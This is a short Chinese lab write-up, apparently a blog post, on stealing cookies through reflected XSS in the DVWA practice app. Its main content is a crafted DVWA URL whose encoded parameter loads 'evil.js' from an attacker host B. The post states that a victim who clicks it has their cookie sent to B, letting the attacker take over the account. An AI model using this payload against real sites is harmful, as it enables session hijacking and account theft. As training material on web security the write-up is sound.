利用XSS获取cookie

如果web应用在用户输入的地方没有过滤特殊字符,比如<, >, ', ", 并提交:
利用XSS获取cookie_第1张图片

此时主机A的cookie值就会发送到主机B上,查看主机B的web日志:
这里写图片描述
发现主机A的cookie值已经存在web日志里了。

虽然是实验,但是如果DVWA有XSS漏洞,而攻击者构造一个http://IP/DVWA/vulnerabilities/xss_r/?name=%3Cscript+src%3Dhttp%3A%2F%2FIPb%2Fevil.js+%3E%3C%2Fscript%3E#,诱骗了用户点击,那么用户的cookie就会发到主机B上,攻击者就可以登录受害者的账户了。

本实验中的xss payload参考《白帽子讲web安全》

你可能感兴趣的:(利用XSS获取cookie)